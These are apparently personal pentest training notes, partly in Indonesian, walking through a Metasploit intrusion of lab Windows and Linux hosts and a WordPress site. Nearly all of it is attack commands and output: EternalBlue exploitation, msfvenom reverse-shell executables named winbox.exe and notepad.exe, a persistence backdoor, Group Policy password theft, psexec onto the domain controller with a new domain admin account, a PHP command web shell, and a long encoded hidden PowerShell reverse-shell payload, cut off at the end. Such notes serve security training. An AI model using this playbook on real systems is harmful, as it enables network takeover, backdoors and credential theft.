Metasploit windows
# msfdb start
# msfconsole
> use auxiliary/scanner/portscan/tcp
> set RHOST 192.168.56.105 192.168.56.100
> run
+] 192.168.56.105: - 192.168.56.105:25 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:21 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:80 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:81 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:110 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:139 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:135 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:445 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:443 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:587 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:995 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:3306 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:3389 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:4433 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:5357 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:5985 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:7777 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:8009 - TCP OPEN
[+] 192.168.56.105: - 192.168.56.105:8080 - TCP OPEN
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.56.100: - 192.168.56.100:53 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:88 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:139 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:135 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:389 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:445 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:464 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:593 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:636 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:3269 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:3268 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:3389 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:5722 - TCP OPEN
[+] 192.168.56.100: - 192.168.56.100:9389 - TCP OPEN
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
> use auxiliary/scanner/smb/smb_version
> set RHOST 192.168.56.105 192.168.56.100
> run
[+] 192.168.56.105:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.56.100:445 - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
> services -p 445
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.56.100 445 tcp smb open Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)
192.168.56.105 445 tcp smb open Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)
> use auxiliary/scanner/smb/smb_ms17_010
> set RHOSTS 192.168.56.105 192.168.56.100
> run
[+] 192.168.56.105:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.56.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.56.105
> set payload windows/x64/meterpreter/reverse_https
> set LHOST 192.168.56.4
> exploit
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o winbox.exe
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.56.4
> set LPORT 8080
> run
$ python -m SimpleHTTPServer 8069
### Download & jalankan file winbox.exe di client
> sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows MEGACORP\rhooke @ KEUANGAN-PC 192.168.56.4:8080 -> 192.168.56.105:49424 (192.168.56.105)
> sessions 2
meterpreter > getpid
Current pid: 5036
meterpreter > sysinfo
Computer : KEUANGAN-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : id_ID
Domain : MEGACORP
Logged On Users : 3
Meterpreter : x86/windows
# locate PowerView.ps1
/usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
meterpreter > load powershell
meterpreter > powershell_import /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
### Create Persistence Backdoor
meterpreter > run persistence -X -U -r 192.168.56.4 -p 4444
meterpreter > background
> set LPORT 4444
> exploit -j
> jobs -K
> exploit
> show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/windows MEGACORP\rhooke @ KEUANGAN-PC 192.168.56.4:4444 -> 192.168.56.105:49185 (192.168.56.105)
### Privilege Escalation WIndows server 2008 Grour Policy Password
meterpreter > run post/windows/gather/credentials/gpp
[+] [2020.08.04-00:46:24] Group Policy Credential Info
============================
Name Value
---- -----
TYPE Groups.xml
USERNAME svc_adm
PASSWORD j4K4R741572!
DOMAIN CONTROLLER DC-SVR
DOMAIN megacorp.local
CHANGED 2020-07-19 12:06:11
NEVER_EXPIRES? 1
DISABLED 0
NAME Default Domain Policy
meterpreter > shell
C:\Windows\system32>net user svc_adm
net user svc_adm
User name svc_adm
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 04/08/2020 11:39:32
Password expires Never
Password changeable 05/08/2020 11:39:32
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *None
The command completed successfully.
### Attack domain controller
meterpreter > background
> use exploit/windows/smb/psexec
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.56.4
> set LPORT 4444
> set RHOST 192.168.56.100
> set SMBUSER svc_adm
> set SMBPASS j4K4R741572!
> exploit
[*] [2020.08.04-00:53:38] Started reverse TCP handler on 192.168.56.4:4444
[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Connecting to the server...
[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Authenticating to 192.168.56.100:445 as user 'svc_adm'...
[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Selecting PowerShell target
[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Executing the payload...
[+] [2020.08.04-00:53:43] 192.168.56.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] [2020.08.04-00:53:55] Encoded stage with x86/shikata_ga_nai
[*] [2020.08.04-00:53:55] Sending encoded stage (176224 bytes) to 192.168.56.100
[*] Meterpreter session 5 opened (192.168.56.4:4444 -> 192.168.56.100:49347) at 2020-08-04 00:53:56 -0400
meterpreter > sysinfo
Computer : DC-SVR
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : id_ID
Domain : MEGACORP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
C:\Windows\system32>net user aceng Anjay123! /add /domain
C:\Windows\system32>net localgroup Administrators aceng /add /domain
# rdesktop -d megacorp -u aceng -p Anjay123! 192.168.56.100
### Vulnerability Assesment
Ada di folder catatan/vunerability-assesment
Vulnerability Assesment adalah ketika kita menemukan vunerability kita melakukan testing atau poc terhadap temuan vunerability tersebut.
kemudian didokumentasikan impact yang akan terjadi terhadap vulnerability yg ditemukan.
### Pentest hasil temuan VA dengan metasploit
msf5 > workspace -a nessus_pentest
[*] Added workspace: nessus_pentest
[*] Workspace: nessus_pentest
msf5 > db_import /home/kali/Downloads/Training_Nessus_ylvmgg.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.56.120
[*] Importing host 192.168.56.105
[*] Importing host 192.168.56.100
[*] Importing host 192.168.56.2
[*] Importing host 10.14.3.234
[*] Successfully imported /home/kali/Downloads/Training_Nessus_ylvmgg.nessus
msf5 > vulns
install metasploit plugins
git clone https://github.com/darkoperator/Metasploit-Plugins.git
msf5 > load pentest
msf5 > setg LHOST 192.168.56.4
msf5 > vuln_exploit
msf5 > vuln_exploit
[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[-] No Exploits where Matched.
git clone https://github.com/DanMcInerney/msf-autopwn.git --recursive
cd msf-autopwn/
sudo apt install pipenv
### Credential Patch Audit - Scan dengan credential
### Pentest postgresql
msf5 > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.120
msf5 auxiliary(scanner/postgres/postgres_login) > run
[+] 192.168.56.120:5432 - Login Successful: postgres:postgres@template1
msf5 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_readfile
msf5 auxiliary(admin/postgres/postgres_readfile) > set RHOST 192.168.56.120
msf5 auxiliary(admin/postgres/postgres_readfile) > use auxiliary/scanner/postgres/postgres_hashdump
msf5 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 192.168.56.120
msf5 auxiliary(scanner/postgres/postgres_hashdump) > run
msf5 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_sql
msf5 auxiliary(admin/postgres/postgres_sql) > set RHOSTS 192.168.56.120
sf5 auxiliary(admin/postgres/postgres_sql) > show options
Module options (auxiliary/admin/postgres/postgres_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
SQL select version() no The SQL query to execute
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
RHOSTS => 192.168.56.120
msf5 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 192.168.56.120
Query Text: 'select version()'
==============================
version
-------
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/postgres/postgres_sql) > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.120
msf5 exploit(linux/postgres/postgres_payload) > set LPORT 8080
msf5 exploit(linux/postgres/postgres_payload) > exploit
[*] Started reverse TCP handler on 192.168.56.4:8080
[*] 192.168.56.120:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/oVSLcTrl.so, should be cleaned up automatically
[*] Sending stage (980808 bytes) to 192.168.56.120
[*] Meterpreter session 1 opened (192.168.56.4:8080 -> 192.168.56.120:51579) at 2020-08-05 02:35:45 -0400
meterpreter >
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 6348 created.
Channel 2 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[ctrl + c]
meterpreter > background
msf5 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink
msf5 exploit(linux/local/udev_netlink) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux no-user @ metasploitable (uid=108, gid=117, euid=108, egid=117) @ metasploita... 192.168.56.4:8080 -> 192.168.56.120:49379 (192.168.56.120)
msf5 exploit(linux/local/udev_netlink) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/udev_netlink) > set session 1
msf5 exploit(linux/local/udev_netlink) > set LHOST 192.168.56.4
msf5 exploit(linux/local/udev_netlink) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf5 exploit(linux/local/udev_netlink) > set LPORT 8080
LPORT => 8080
msf5 exploit(linux/local/udev_netlink) > exploit
[*] Started reverse TCP handler on 192.168.56.4:8080
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2361
[+] Found netlink pid: 2360
[*] Writing payload executable (207 bytes) to /tmp/okdriNosTv
[*] Writing exploit executable (1879 bytes) to /tmp/rrmpTfgUdR
[*] chmod'ing and running it...
[*] Sending stage (980808 bytes) to 192.168.56.120
[*] Meterpreter session 2 opened (192.168.56.4:8080 -> 192.168.56.120:53184) at 2020-08-05 02:50:22 -0400
meterpreter >
meterpreter > shell
Process 6391 created.
Channel 1 created.
whoami
firefart
/bin/bash -i
bash: no job control in this shell
firefart@metasploitable:/#
### Hack with Tunneling
Hack metasploitable2 vm via windows
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o notepad.exe
msf5 exploit(linux/local/udev_netlink) > use exploit/multi/handler
msf5 exploit(multi/handler) > set windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.4:8080
meterpreter > portfwd add -l 8085 -p 80 -r 192.168.56.4
meterpreter > portfwd list
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:8085 192.168.56.4:80 Forward
1 total active port forwards.
meterpreter > portfwd add -l 8086 -p 22 -r 192.168.56.120
[*] Local TCP relay created: :8086 <-> 192.168.56.120:22
$ ssh -p 8086 msfadmin@127.0.0.1
## dengan dynamic port forwarding
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > route add 192.168.56.0/24 3
[*] Route already exists
msf5 auxiliary(server/socks4a) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.56.0 255.255.255.0 Session 3
[*] There are currently no IPv6 routes defined.
msf5 auxiliary(server/socks4a) >
msf5 auxiliary(server/socks4a) > run
$ proxychains curl 192.168.56.120
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.120:80-
<><>-OK
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>
### Web Application Attacks
#### Pentest Wordpress
$ dirb http://192.168.56.105/
$ whatweb http://192.168.56.105/wordpress/
/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete
http://192.168.56.105/wordpress/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.3], IP[192.168.56.105], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], OpenSSL[1.1.1c], PHP[7.4.3][C:\xampp\htdocs\wordpress\wp-includes\pomo\plural-forms.php], Script[text/javascript], Title[MegaCorp Website], UncommonHeaders[link], WordPress[4.9.8], X-Powered-By[PHP/7.4.3]
$ wpscan --url http://192.168.56.105/wordpress -e vp
$ wpscan --url http://192.168.56.105/wordpress -e u1-5
$ wpscan --url http://192.168.56.105/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: monkey123
$ git clone https://github.com/b374k/b374k.git
$ cd b374k
$ php index.php -p Anjay123! -o shell.php -s -b -z gzcompress -c 9
b374k shell packer 0.4.2
Filename : shell.php
Password : Anjay123!
Theme : default
Modules : convert,database,info,mail,network,processes
Strip : yes
Base64 : yes
Compression : gzcompress
Compression level : 9
Result : Succeeded : [ shell.php ] Filesize : 111695
$ gedit shell.php ---> copy semua isi file
masuk ke admin wordpress -> tampilan -> editor -> ganti template 404 -> paste dari isi file shell.php
buka http://192.168.56.105/wordpress/ngasal
masukin password Anjay123!
dengan simple Backdoor :
masuk ke admin wordpress -> tampilan -> editor -> ganti template 404 -> paste dari isi file shell
```
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
?>
```
buka webnya :
http://192.168.56.105/wordpress/aa?cmd=whoami
msf5 > handler -H 192.168.56.4 -P 6988 -p windows/meterpreter/reverse_tcp
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=6988 -f psh-cmd
usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of psh-cmd file: 6319 bytes
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDADUANQBLADEAOABDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA0AHgAcwBSAHUAawAwAGEAcQBkAEkAdgBmAHIAbgBIAHMARQBMAC8AaQBXAHEAYwBOAEwATABEAE8AdwB0AHEAdwArAE4AWAByAC8AMwA2AEQAYgBkAEwAMABtAHYAYgBhAGsAdwA3ADUAcwBZACsAWgAyAFoAbAB2AHYAcABuAEYAVABVAEoAYgBVAEIANQBLADQAcgBvAGoAZgBUADQANwBQAGUAbgBoAEMAQQBlAFMAawBuAFAAKwA3AE8AYQBsAEgASwBtAHAASgB5AGUAdwBtAGcAdQBHADAAZwBkAEoAbQBhAEwARgBvAHMAbwBEAFQATQBQAFoAegBVADAAbABpAFMASQBTAGkAcwBPADgAMABDAEEAQwB4AFQARQBKAEgAaABrAGwAcwBhAEoASwBmADAAawBqAG4AMABUAGsANAB2AFoAeABUAG0AdwBoAGYAWgBaAHkAZgB4AFkAYQBqAEQAOQBpAGQAaABUAGIAVgByAEQAdABFACsAawBDAGgAVQA2ADYAMQArAEUAMgBUAGgAMABwAFcAQQB0AEcAaABTAEoALwArAGkAUwByADAAdwB0ADkAVgBxAGcAdABFADgAeABpAFIAYgBhADIAcwBTAEIAQgB3AFcARgBNAFYAcQBVAHYAYQBuAHIAZwAvAFgAWgBCAEYATgBtAGsAZABzAFIAagA3AG8AcgBDAGkASQBhAGwAeQA4AEkAZwBqAEwARgBMAHUAbQBCAHQAUgBVAHcAaQBmAE8ANwBFAHMAZwBvAHgAdwBDAGMAaQBJAG8AbABDAEMAYQBKAEoAMQBRACsAYgBpAGcAegBEAFgAcwBSAHQANQBEAGcAUgBpAFcATQA1AEwAMAAxAFQAdwA5AFAAWgA3AEEAOQBsAGUAagB6ADEATABnAGsARgBEAFUAaQBoAEYAUQBvAFMAOABZAFYARgBvAGgAVwAxAFMAVgB4AG8ANAB0AEIAaAA1AEkANgA0AE0AOQBDAHkAUgBFAFIARABiADYAYQBxAEkATABiAGkAVAAwAFQASgBoAFEAbABqAGUAZQBsADMAegBDAGgAZABzAHMANAB3ACsAMQBVAGwANQBhAFUAUwBTAFAAVgBFAHAATwBZAGgAaABkADkARgBhAFgASQBuAFkAZQBTAGcASgA3AC8AaQBaAHAAcAAwAEYAWgA1AEQANABnAEcAegBMADIAZQBuAFoANgBkAHUAUgBoAEYAdQBYAHYAdgA2AFMANQBMAEEANgBHAFMANgBIAHgATgB3AFQAZQBuAHgAbQBPADQARgBQADAAagBGAHYARwBUAEMATQBWAGoAdwBhAEEAdgBUADMASAAyAFUARQBIAFgAMgBEAEsAeQBVAFkAMgAvAG4AZQB2ADcASAArAG4AbwBtAEQASwBKAHoASABSAGEAbQBRADAANgBkAEcAUwBnAGMATQA1AG4AYgBrAG4AZQBwADQARQA4AFkAVwBTAFUAdQBEAFUAbAAxAEcAKwBLAEEAMgBoAG4AcABsAE4AYwBBAEoAaQA0AGoAKwB4AEEATABtAFYAZwBYAFgARgBMAGsANAB3AFoAeABxAG8AUQBSAEQANABzAFUAdABEAFQAUAAzADYAbgBWAEEAaQBxAGUAZABZADIARQBNAG8AZABFAHkASQBZAGsAeABlAEEAVgA1AEUALwA5ADEAcABsAEQASABoAFMANQBGAFoAbwBrAEEASQBRAE8AYwB5AEIAZQB6AGcAVwBxAGsAMAB6ADYAUwBPADkAdABkAG4AbwA2AEIAeQBHADUAdwBuAEEAYwA1ADYAVgBlAEEAcgBWAG0ANQB5AFcATABZAEUAYQBjAHYASQBUAEMAbQBCADYAMwBVAEMATAA0AGYAaQBoAC8AZABkAGQATQBtAEsAQQAyAGoAawBWAG0AYgBxAFoAbQBPAEIANwBQAHEALwBBAHcARgBsAEYAaQBRADkASQBnADkAbgB0AHIAUQBXAHkASwBXAFEAcABGAFgAbQBwAFMAaAB4AGgAYgBpADMAcgBaAHUAZgBLAHIAUQBGAFEAdwBZADEAQQBEAFkARwBrAEYAaQBZAEMAVgBGAEEAQgBMAHAARgBTAEkAdwBNAFYAOQAyAHQAVwBDAFIAVQBRAHIAVwBEAEEAUwBnAE0AeQArADYATwBzAE0AZQAxAEQAaQBSADYAYgB2AHUAWQBNADkANABzAGoALwA5AEQARABqADgAbwBHADQASwBSAFkAWgBDAEMALwA4AGcAdwBSAGIAagBJAHUAOABOAEsAUwBSAGcATgA2AFIANABnAHAAawArADAAKwBIAHYAKwBnAFoAZQB6AGMAcQBFAFQAawBtAFEAcwBuAEsAWQAyAHAAcwBSAGMAcgBwADMATwBPAGsAVwA2AHEAbgBsAEQAegBDAHMAZwBjAGgARQBnAEIAQQBQAGUASwBCAGcAVwBQAHkAcgBuAHgAbwBFAGMAbwBiADcAWgBaAFcARQBEAHkAVABWAHMAaABNADIAMwBpAGkATwBsAHAAVAB2AFcAWABDAGQAMABCAEwATABWADYAOQBjAGoANgAyADUAMAAwAHQAcQBtADUAOABGADcAWABpAGwAdABuAHMAVgBmAHYATgBaAG4AbgBWAHQAbwBaAGwAWQBkAFYAYQA0AG0ATwB2AEoAYwB6AGEAZQBEADYAMwBVAFAATgB1AE0AQgBFAFAATABkAFMAOABwADgAVwBuAFMAWABtADMAYQBOAE8AZAAxAFUASABPAFoASwBPADkAMgB4AG0ANwBkAGQASABZADcATwBhAGUANAAwADYAcQByAHUAdABkAHUAZABhAGQALwByAFoATwBPADYATgBLADMAeQBoAGUANABrADYAMQBsAG4AUgBHAHgAdABvAG8AbAB1AE0AYQBYAFQAZgA3AGQATgBCAC8AYQB0AGYARgA0ADIAVABJADgATQBEAFYAdgBMAEgAKwBIAHQATgBOAEoANQBvAFAAZABXADcAdQBXAGcAZwAxAC8ASgBLADkAYQA3AHYARABoAG0AOAA2ADIAMABtAFQAawByAGwAVwA3AE4AQQArADYAaQBQADAAMABiADQAYgBEAEIAcgBlAHcAbQB2AEUAUwBIAHMALwBYAEYAYQBDAE8AVgBwAFcAdgBSAHAARwBMAGQAUQBvAGIAdAB0AHYAbQBkAEUAZgAxAEEAMAAwAHEAQgBsADkAZgBNAHQANwBwAGYATwBxAHAAagA4ADQAeQAxAHIAOQBZAFkAegBiAEEAWABNAGEAVABVADIAZgBqAEoARwBEAEkAdQAzAGUAOAAvAFcAcgBXAHoAOQBNAGMAYwBLAGUAcwBUAFIAUwBHAGQAUgA1ADIATgBZADEAawBPAG0AVgBVAGIATgA4AFMAWABjAFAAeQAzADcARABRAHoAVwBRAEcAUQBZAGMANABUAHAAOQBHAHAAeQBQAHcAVwBiADMASABuAFIARwBBADkAMwBoAFMASQBTAHQAcwBhAFkATgBQAGMAMQBEAHIAdQBWAFAATQBEAEoAQQAyAGwAaQBpAHUAcwBFAHIAMgArAHUAZQAyAGQATwBHAHcAMAB0AGYAZgAzAHoAUwBmAGYAQwBaAGoARgBmAFgAWgBoAHUAZAAxACsAMgBlAHAAbQBuAG4AdwBTAFAAOABhAHMAZwAyAEYANQB0AHcAYgBLAHkAdgBWAG0AdQBCADIAeQBPAHcAZgBhACsAOQBIADMAeAA0AGsANQBJAEUAVwBKAEkATABpAHYATQBYAHEAZgA5AFIAeQB6AFoAeABGAFAAdQBZAEEAUwBXAGcARwAyAGQAMQBXAE8AZABSAC8AZABoAGkAZQA1AHkAbQBHAG8AcQBTADMAcwBaAFAASgBBAG8ASgBnAHcAcwBOAHIAcgB5AE0AeQA0AGcAeABiAHEAZgBOAC8AZABDAEwANABXAFkANQA5AFAAdgAwACsAaABuAEEAcwBIAFQANQA2AGsAaQBWAG4AZwBYAFYAcgAzADAALwBXADcAcQA1AGUAUQBBAHYAbwBVAEQAMgBEAEMANQAwAFMATwBnAEoAUAAxAC8AYwBsAEkAcABGADYATwBQAEYAVABiAGsASQBVAGYANQA2AGEAQgBXACsAMgBDAG8ASABXAC8AbgAwAEkAawBpAHgAZQBUAGIATwA5AHMAYgBWAHQASABCAHkATgB2ADkAZgBJAFQAdgBXAHEAZwA5AC8AegByADkAQwA5AG4AWAB0AEoANwB1AC8AQgBHAE0AeAB2AHcALwA0AHUAOQBWAHYARgAzADQATAAwAGQAKwBOAGYASQBTAHAAQQBFAEUATABXAGcAMABqAGgANwB2AHUAQgB3AEEAYwA2AGYASABpAFgAYwBBAEcAWAB6AGYAdQA4AFUAbABmADQAMgA0AFQAYwBkAEcARgBGADQAUwB6ADAANwA4AEIAZQBJAGYAeQArAHkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQ